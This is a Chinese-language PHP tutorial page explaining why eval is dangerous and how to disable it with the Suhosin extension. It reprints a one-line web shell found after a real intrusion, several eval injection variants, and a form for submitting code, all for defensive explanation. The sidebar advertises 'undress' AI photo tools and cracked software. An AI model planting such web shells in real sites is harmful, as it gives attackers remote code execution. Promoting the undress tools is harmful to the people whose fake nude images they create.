搜尋
首頁後端開發PHP問題php怎樣才能禁止有安全隱患的eval

之前網站收到駭客攻擊,我們才知道php的eval函數有很大的安全隱患。今天我們就來介紹一下禁止eval的方法,有需要的可以參考參考。

php怎樣才能禁止有安全隱患的eval

前段時間,網站遭受了駭客的入侵,後來在排查中發現了一個php,裡面的內容只有很少:

#
<?php eval($_POST[asda123131323156341]);?>

然後網路上搜尋一下php的eval函數,發現這個eval函數帶有很大的安全隱患。

本地測試一下,在本機環境寫一個php,內容如下:

default.php:

<?php eval($_GET[asda]);?>

然後造訪:localhost/test/default.php?asda =phpinfo();

就可以看到已經把phpinfo給執行了。

或是存取localhost/test/default.php?asda = echo 11111;同樣也會發現1111被echo出來了。

類似的手段還有:

<?php $code="${${eval($_GET[c])}}";?>

訪問localhost/test/default.php?c=phpinfo();即可看到

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?>

訪問localhost/test/ default.php?c= ${${phpinfo()}};即可看到

利用可以執行php的eval函數,駭客可以用這個來上傳一些後台木馬,比如說上傳php,然後透過url存取這個php來獲得更大的權限。這種稱為一句話木馬的入侵。比如說:寫一個html,內容如下:

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

然後寫一個default.php,內容為:>

<?php eval($_POST[c]);?>

這樣的話,想執行什麼php就可以直接提交運行即可。

所以: eval()對於php安全來說具有很大的殺傷力,eval函數減弱了你的應用的安全性,因此一般不用的情況下為了防止類似如下的一句話木馬入侵,需要禁止!

然而網路上很多說使用disable_functions禁止掉eval的方法都是錯的!

其實eval()是無法用php.ini中的disable_functions禁止掉的:

because eval() is a language construct and not a function

eval是zend的,因此不是PHP_FUNCTION 函數;

那麼php怎麼禁止eval呢?

如果想禁掉eval可以用php的擴充 Suhosin:

安裝Suhosin後在php.ini中load進來Suhosin.so,再加上suhosin.executor.disable_eval = on即可!

總結,php的eval函數在php中是無法停用的,因此我們也只有使用外掛了!

至於安裝suhosin來禁止eval函數的步驟為:(未測試)

#說明:

php安裝目錄:/usr/local/php5

#php.ini設定檔路徑:/usr/local/php5/etc/php.ini

Nginx安裝目錄:/usr/local/nginx

Nginx網站根目錄:/usr/ local/nginx/html

1、安裝編譯工具 

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2、安裝suhosin

cd /usr/local/src   #进入软件包存放目录
wget  http://download.suhosin.org/suhosin-0.9.33.tgz    #下载
tar zxvf suhosin-0.9.33.tgz   #解压
cd suhosin-0.9.33   #进入安装目录
/usr/local/php5/bin/phpize   #用phpize生成configure配置文件
./configure  --with-php-config=/usr/local/php5/bin/php-config   #配置
make   #编译
make install   #安装
安装完成之后,出现下面的界面,记住以下路径,后面会用到。
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   #suhosin模块路径

3、設定php支援suhosin 

vi /usr/local/php5/etc/php.ini  
 #编辑配置文件,在最后一行添加以下内容 
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

注意:suhosin .executor.disable_eval = on 的功能是停用eval函數

4、測試

vi /usr/local/nginx/html/phpinfo.php    #編輯

#
<?php
phpinfo();
?>

: wq!  #儲存退出

service php-fpm restart   #重啟php-fpm 

service nginx restart   #重啟nginx

注意:如果是apache的話也是一樣的,重啟apache即可。

瀏覽器開啟phpinfo.php 如下圖所示,可以看到suhosin相關資訊

 至此,Linux下php安裝suhosin安裝完成!

注意:禁用了 eval後,會有啥後果呢?首先是程式碼裡使用eval 的軟體將無法使用例如大名鼎鼎的Discuz! 論壇和PHPWind論壇將無法正常使用,也影響到phpMyAdmin的舊版本,如果更新到目前最新的3.2.5,就可以使用,只是預設有個警告的提示,在config.inc.php 中加上$cfg['SuhosinDisableWarning']=true; 

就可以取消這個警告了。

注意:除了eval之外,還有assert也是類似的用法。

推薦學習:php影片教學

以上是php怎樣才能禁止有安全隱患的eval的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:CSDN。如有侵權,請聯絡admin@php.cn刪除
酸與基本數據庫:差異和何時使用。酸與基本數據庫:差異和何時使用。Mar 26, 2025 pm 04:19 PM

本文比較了酸和基本數據庫模型,詳細介紹了它們的特徵和適當的用例。酸優先確定數據完整性和一致性,適合財務和電子商務應用程序,而基礎則側重於可用性和

PHP安全文件上傳:防止與文件相關的漏洞。PHP安全文件上傳:防止與文件相關的漏洞。Mar 26, 2025 pm 04:18 PM

本文討論了確保PHP文件上傳的確保,以防止諸如代碼注入之類的漏洞。它專注於文件類型驗證,安全存儲和錯誤處理以增強應用程序安全性。

PHP輸入驗證:最佳實踐。PHP輸入驗證:最佳實踐。Mar 26, 2025 pm 04:17 PM

文章討論了PHP輸入驗證以增強安全性的最佳實踐,重點是使用內置功能,白名單方法和服務器端驗證等技術。

PHP API率限制:實施策略。PHP API率限制:實施策略。Mar 26, 2025 pm 04:16 PM

本文討論了在PHP中實施API速率限制的策略,包括諸如令牌桶和漏水桶等算法,以及使用Symfony/Rate-limimiter之類的庫。它還涵蓋監視,動態調整速率限制和手

php密碼哈希:password_hash和password_verify。php密碼哈希:password_hash和password_verify。Mar 26, 2025 pm 04:15 PM

本文討論了使用password_hash和pyspasswify在PHP中使用密碼的好處。主要論點是,這些功能通過自動鹽,強大的哈希算法和SECH來增強密碼保護

OWASP前10 php:描述並減輕常見漏洞。OWASP前10 php:描述並減輕常見漏洞。Mar 26, 2025 pm 04:13 PM

本文討論了OWASP在PHP和緩解策略中的十大漏洞。關鍵問題包括注射,驗證損壞和XSS,並提供用於監視和保護PHP應用程序的推薦工具。

PHP XSS預防:如何預防XSS。PHP XSS預防:如何預防XSS。Mar 26, 2025 pm 04:12 PM

本文討論了防止PHP中XSS攻擊的策略,專注於輸入消毒,輸出編碼以及使用安全增強的庫和框架。

PHP接口與抽像類:何時使用。PHP接口與抽像類:何時使用。Mar 26, 2025 pm 04:11 PM

本文討論了PHP中接口和抽像類的使用,重點是何時使用。界面定義了無實施的合同,適用於無關類和多重繼承。摘要類提供常見功能

See all articles

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
3 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳圖形設置
3 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您聽不到任何人,如何修復音頻
3 週前By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:如何解鎖Myrise中的所有內容
3 週前By尊渡假赌尊渡假赌尊渡假赌

熱工具

Atom編輯器mac版下載

Atom編輯器mac版下載

最受歡迎的的開源編輯器

SecLists

SecLists

SecLists是最終安全測試人員的伙伴。它是一個包含各種類型清單的集合,這些清單在安全評估過程中經常使用,而且都在一個地方。 SecLists透過方便地提供安全測試人員可能需要的所有列表,幫助提高安全測試的效率和生產力。清單類型包括使用者名稱、密碼、URL、模糊測試有效載荷、敏感資料模式、Web shell等等。測試人員只需將此儲存庫拉到新的測試機上,他就可以存取所需的每種類型的清單。

DVWA

DVWA

Damn Vulnerable Web App (DVWA) 是一個PHP/MySQL的Web應用程序,非常容易受到攻擊。它的主要目標是成為安全專業人員在合法環境中測試自己的技能和工具的輔助工具,幫助Web開發人員更好地理解保護網路應用程式的過程,並幫助教師/學生在課堂環境中教授/學習Web應用程式安全性。 DVWA的目標是透過簡單直接的介面練習一些最常見的Web漏洞,難度各不相同。請注意,該軟體中

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版

EditPlus 中文破解版

EditPlus 中文破解版

體積小,語法高亮,不支援程式碼提示功能